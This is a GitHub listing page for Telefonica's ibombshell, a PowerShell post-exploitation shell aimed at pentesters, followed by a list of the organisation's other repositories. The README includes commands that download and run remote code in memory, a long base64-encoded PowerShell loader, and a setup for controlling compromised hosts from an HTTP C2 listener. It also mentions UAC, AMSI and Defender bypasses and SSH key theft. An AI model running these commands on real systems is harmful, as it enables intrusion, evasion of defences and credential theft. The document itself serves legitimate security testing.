Telefonica/ibombshell Telefonica/ibombshell

  • Stars
    star
    308
  • Rank 131,832 (Top 3 %)
  • Language
    Python
  • License
    GNU General Publi...
  • Created almost 6 years ago
  • Updated about 3 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
Telefonica/ibombshell
github

Telefonica

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Tool to deploy a post-exploitation prompt at any time

Supported Python versions License

ibombshell - Dynamic Remote Shell

      ,--.!,    _ ____                  __   _____ __         ____
   __/   -*-   (_) __ )____  ____ ___  / /_ / ___// /_  ___  / / /
 ,d08b.  '|`  / / __  / __ \/ __ `__ \/ __ \\__ \/ __ \/ _ \/ / /
 0088MM      / / /_/ / /_/ / / / / / / /_/ /__/ / / / /  __/ / /
 `9MMP'     /_/_____/\____/_/ /_/ /_/_.___/____/_/ /_/\___/_/_/

 [+] Starting the console...
 [*] Console ready!

ibombshell is a tool written in Powershell that allows you to have a prompt at any time with post-exploitation functionalities (and in some cases exploitation). It is a shell that is downloaded directly to memory providing access to a large number of pentesting features. These functionalities can be downloaded directly to memory, in the form of a Powershell function. This form of execution is known as everywhere.

In addition, ibombshell provides a second execution mode called Silently, so the pentester can execute an instance of ibombshell (called warrior). The compromised computer will be connected to a C2 panel through HTTP. Therefore, it will be possible to control the warrior and be able to load functions in memory that help the pentester. This is happening whithin the post-exploitation phase.

Prerequisities

To run ibombshell everywhere it is mandatory to have PowerShell 3.0 or higher. For operating systems other than Windows you can read more about this in the PowerShell GitHub - PowerShell for every system!.

To run the ibombshell silently mode you need python 3.6 and some python libraries. You can install this with:

cd ibombshell\ c2/
pip install -r requirements.txt

Note: ibombshell C2 works in python 3.X. Make sure you run a pip relative to this version.

Usage

ibombshell has two execution modes:

ibombshell everywhere

To load ibombshell simply run on PowerShell:

iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/Telefonica/ibombshell/master/console’)

Now you can run the downloaded ibombshell console running:

console

ibombshell everywhere in isolated environments

If you need to use ibombshell in isolated environments, you must prepare your computer first in a networked environment. Load all the functions you will need, and use savefunctions to save them in the Windows registry.

Now you can use this base 64 code to get ibombshell:

powershell.exe -E "JABwAGEAdABoACAAPQAgACcAaABrAGMAdQA6AFwAcwBvAGYAdAB3AGEAcgBlAFwAYwBsAGEAcwBzAGUAcwBcAGkAYgBvAG0AYgBzAGgAZQBsAGwAXABjAG8AbgBzAG8AbABlACcAOwAgAHQAcgB5ACAAewAJAGkAZgAoAHQAZQ
BzAHQALQBwAGEAdABoACAAJABwAGEAdABoACkAIAB7ACAAJABjAG8AbgBzAG8AbABlACAAPQAgACgARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAcABhAHQAaAApAC4ATgBhAG0AZQA7ACAAYwBkACAAaABrAGMAdQA6
ADsAIAAkAG4AYQBtAGUAIAA9ACAAJABjAG8AbgBzAG8AbABlAC4AcwBwAGwAaQB0ACgAIgBcACIAKQBbAC0AMQBdADsAIAAkAGMAbwBkAGUAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIAJABjAG
8AbgBzAG8AbABlACIAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAUAByAG8AcABlAHIAdAB5ACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUA
YwB0ACAAewBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAcABzAG8AYgBqAGUAYwB0ACAALQBQAHIAbwBwAGUAcgB0AHkAIABAAHsAIgBwAHIAbwBwAGUAcgB0AHkAIgA9ACQAXwA7ACAAIgBWAGEAbAB1AGUAIgAgAD0AIAAoAEcAZQ
B0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiACQAYwBvAG4AcwBvAGwAZQAiACAALQBOAGEAbQBlACAAJABfACkALgAkAF8AfQB9ACkALgBWAGEAbAB1AGUAOwAgACQAYwBvAGQAZQAgAHwAIABv
AHUAdAAtAHMAdAByAGkAbgBnACAAfAAgAGkAZQB4ADsAIABjADoAOwAgAGMAbwBuAHMAbwBsAGUAOwB9AH0AYwBhAHQAYwBoAHsAdwByAGkAdABlAC0AaABvAHMAdAAgACQARQByAHIAbwByAFsAMABdAH0A"

ibombshell silently mode

This version allows you to run the ibombshell console and remotely control it from the C2 panel created in python. To run this version, first you must launch the console process in powershell:

iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/Telefonica/ibombshell/master/console’)

On ibombshell C2 path, prepare the C2:

python3 ibombshell.py

And create the listener where the warriors will connected:

iBombShell> load modules/listener.py
[+] Loading module...
[+] Module loaded!
iBombShell[modules/listener.py]> run

The default listener port is 8080. Finally you can launch the console in silently mode on the host to get remote control:

console -Silently -uriConsole http://[ip or domain]:[port]

ibombshell C2 scheme

The basic operation of the ibombshell control panel follows the following scheme:

        ibombshell                 C2
            |                      |
            |    newibombshell     |
            +--------------------->| --+ register
            |                      |<--+ from IP
            |    get functions     |
            |   and instructions   |
            +--------------------->|
            |                      |
            |    send functions    |
            |   and instructions   |
execute +-- |<---------------------+
        +-->|                      |
            |       results        |
            +--------------------->|
            |                      |

Docker

We have created a docker container with everything you need to make it works. Run this command from Dockerfile location.

sudo docker build -t "ibombshell" .
sudo docker run -it ibombshell

Example videos

Some example videos...

iBombShell: PoC Warrior + Bypass UAC + Pass the hash

iBombShell: PoC Warrior + Bypass UAC + Pass the hash

iBombShell: macOS

iBombShell: PoC de uso desde macOS

ibombshell: Extracting Private SSH Keys on Windows 10

ibombshell: Módulo para extracción de claves privadas SSH en Windows 10

iBombShell: PoC savefunctions

iBombShell: PoC savefunctions

ibombshell - Silently bypass UAC Environment Injection

ibombshell - Modo silencioso para el bypass UAC Environment Injection

iBombShell - Mocking Trusted Directory

iBombShell - Mocking Trusted Directory

iBombShell - DLL generation

iBombShell - DLL Generation

iBombShell - AMSI & Windows Defender Bypass

iBombShell - AMSI & Windows Defender Bypass

License

This project is licensed under the GNU General Public License - see the LICENSE file for details

Contact

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. WHENEVER YOU MAKE A CONTRIBUTION TO A REPOSITORY CONTAINING NOTICE OF A LICENSE, YOU LICENSE YOUR CONTRIBUTION UNDER THE SAME TERMS, AND YOU AGREE THAT YOU HAVE THE RIGHT TO LICENSE YOUR CONTRIBUTION UNDER THOSE TERMS. IF YOU HAVE A SEPARATE AGREEMENT TO LICENSE YOUR CONTRIBUTIONS UNDER DIFFERENT TERMS, SUCH AS A CONTRIBUTOR LICENSE AGREEMENT, THAT AGREEMENT WILL SUPERSEDE.

This software doesn't have a QA Process. This software is a Proof of Concept.

If you have any problems, you can contact:

[email protected]

More Repositories

1

Eternalblue-Doublepulsar-Metasploit

Module of Metasploit to exploit the vulnerability Eternalblue-Doublepulsar.
Ruby
1,025
star
2

HomePWN

HomePwn - Swiss Army Knife for Pentesting of IoT Devices
Python
827
star
3

prometheus-kafka-adapter

Use Kafka as a remote storage database for Prometheus (remote write only)
Go
285
star
4

ATTPwn

ATTPwn
Python
205
star
5

toolium

Wrapper tool of Selenium and Appium libraries to test web and mobile applications in a single project
Python
108
star
6

uac-a-mola

Python
107
star
7

on-the-fly

on-the-fly
Python
82
star
8

Telefonica-WannaCry-FileRestorer

Tool to restore some WannaCry files which encryption weren't finish properly
PowerShell
59
star
9

Airdrop-Crazy

Airdrop Crazy
Python
55
star
10

mistica-web

React components library for Telefonica Design System (Mistica)
TypeScript
46
star
11

nginx-canary

nginx with canary release strategy
Lua
45
star
12

level_up

Python
40
star
13

HiddenNetworks-Python

Python
37
star
14

HashCheck

Ideaslocas Repository
Python
36
star
15

USBHiddenNetworks

PowerShell
31
star
16

SDK-SMS-Stack

SDK-SMS-Stack
Java
30
star
17

webview-bridge

Novum JavaScript Bridge
TypeScript
26
star
18

latch-plugin-wordpress

Latch module for WordPress that lets end-users add an extra level of security to their accounts
PHP
24
star
19

TEFstrap

Bootstrap Theme for Telefonica
CSS
23
star
20

latch-plugin-unix

Shell
20
star
21

node-merge-config

Merge multiple configuration sources: JSON and YAML files, directories, environment properties and command-line arguments.
JavaScript
19
star
22

mistica

18
star
23

latch-sdk-python

Python
18
star
24

mistica-design

Mística Design System (only design)
18
star
25

latch-sdk-php

PHP
17
star
26

node-express-logging

Express middleware to log, using a configurable logger, each request and response.
JavaScript
16
star
27

OMLASP

OMLASP (Ideas Locas)
Jupyter Notebook
15
star
28

node-server-terminate

Allow terminating a server in an orderly fashion
JavaScript
15
star
29

seed-golang

Seed for golang projects
Go
14
star
30

WPM-Wordpress-in-Paranoid-Mode

Ruby
13
star
31

mistica-ios

Swift
13
star
32

node-jwt-utils

JSON Web Tokens (JWT) utils.
JavaScript
13
star
33

latch-plugin-joomla

PHP
11
star
34

tweaks

A customizable debug screen to view and edit flags that can be used for development
Kotlin
11
star
35

HoneyBadger

Python
10
star
36

MetaThief

PoC for extracting office files into PDF file metadata
Python
10
star
37

node-express-domaining

Express middleware to automatically create and destroy a domain.
JavaScript
10
star
38

toolium-examples

Set of examples to learn how to use toolium different functionalities
Python
10
star
39

toolium-template

Base project to start using toolium for your testing automation projects
Python
10
star
40

alfalfa

Opinionated startup for node services and applications to remove plumbing and boilerplate
TypeScript
10
star
41

puppet-github-actions-runner

In This Repository you can find a module that will setup all of the files and configuration needed for GitHub Actions runner to work on Linux hosts (Ubuntu, Debian and CentOS).
Ruby
10
star
42

node-http-pooling-agent

HTTP agent with smart socket pool
JavaScript
9
star
43

node-express-tracking

Express middleware to track the request and response storing in the domain the operation, transactionId and correlator.
JavaScript
9
star
44

CrazyToolBox

A web3 utilities toolbox
Python
9
star
45

mistica-icons

Mística Design System Icons library
8
star
46

govice

Golang library to develop a production-like service
Go
8
star
47

mistica-android

Kotlin
7
star
48

luis-cli

Simple command-line interface to interact with Microsoft LUIS APIs.
TypeScript
7
star
49

node-express-metrics

Express middleware to automatically log the metrics traces.
JavaScript
7
star
50

Docker-WPM-Environment

Ruby
6
star
51

latch-sdk-java

Java
6
star
52

latch-sdk-nodejs

NodeJS SDK for latch
JavaScript
6
star
53

node-themible

Themible Module to set up the theme (to customize the web presentation) and locales (for internationalization) of a node.js express application.
JavaScript
6
star
54

language-model-converter

Language model converter yaml <-> json for LUIS
TypeScript
5
star
55

Cube11Paths

Machine Learning authentication system based on a custom Rubik cube.
C
5
star
56

latch-plugin-jira

Latch plugin for Jira
Java
4
star
57

android-nested-scroll-webview

Android WebView implementation for nested scrolling layouts
Java
4
star
58

seed-bot

Seed bot project
TypeScript
4
star
59

clips

Snapshot of the CLIPS rules engine
C
4
star
60

latch-plugin-openLDAP

C
4
star
61

latch-sdk-c

C
4
star
62

latch-sdk-dotnet

C#
3
star
63

LambdaNetwork

Python
3
star
64

x-ray_code

XRayCode
Python
3
star
65

gymnos

A training platform for AI models
Python
3
star
66

msteams-private-messages

Send private messages programmatically in MSTeams
JavaScript
3
star
67

k8s-spa

K8s Static Pod Autoscaler
Rust
3
star
68

helm-charts

Kubernetes applications
Python
3
star
69

java-plainmap

Java library to access elements in a hierarchical map as a simple map
Java
3
star
70

latch-plugin-drupal7

PHP
3
star
71

latch-plugin-dotnet-membership-provider

C#
3
star
72

post-buildkite-plugin

Post jobs recovery buildkite plugin (WIP)
JavaScript
2
star
73

latch-plugin-squirrelmail

PHP
2
star
74

latch-sdk-ruby

Ruby
2
star
75

jwt-bulk-generator

Script to generate JWT tokens and store them in a csv file
JavaScript
2
star
76

latch-plugin-prestashop

PHP
2
star
77

Metaverse-3d-Assets

2
star
78

android-mock-api-server

Kotlin
2
star
79

latch-plugin-jenkins

Latch plugin for Jenkins CI tool
Java
2
star
80

latch-plugin-redmine

Ruby
2
star
81

latch-sdk-powershell

C#
2
star
82

dome9-cli

Dome9 utilities: SDK, CLI & Agile module
Python
2
star
83

latch-plugin-roundcube

PHP
2
star
84

living-app-v2-react-template

Set up a modern Living App by forking.
JavaScript
2
star
85

latch-plugin-open-xchange

Java
2
star
86

latch-plugin-phpBB

JavaScript
2
star
87

latch-plugin-drupal8

PHP
2
star
88

github-pr-comment-buildkite-plugin

buildkite plugin to post a comment in a PR
Shell
2
star
89

XAIoGraphs

XAIoGraphs (eXplainability Articicial Intelligence over Graphs) is an Explicability and Fairness Python library for classification problems with tabulated and discretized data.
Python
2
star
90

iot-utils

IOT operation Utilities & systems management tools - Ansible Scripting Python WinSSH OpenStack VirtualBox MySQL Postgress MongoDB DevOPS Admin
Shell
2
star
91

niji-dashboard-angular

Niji Dashboard 2.x (Angular)
TypeScript
1
star
92

latch-plugin-owncloud

PHP
1
star
93

la-acme-inc

TypeScript
1
star
94

react-code-test

TypeScript
1
star
95

latch-plugin-sugarCRM

PHP
1
star
96

latch-plugin-drupal6

PHP
1
star
97

latch-plugin-dotnetnuke

C#
1
star
98

latch-plugin-WindowsAuthProvider

C
1
star
99

qacdco-performance

QACDCO performance testing framework.
Python
1
star
100

object-storage

Tool to upload and keep objects in a AWS S3 or Azure Blob storage
TypeScript
1
star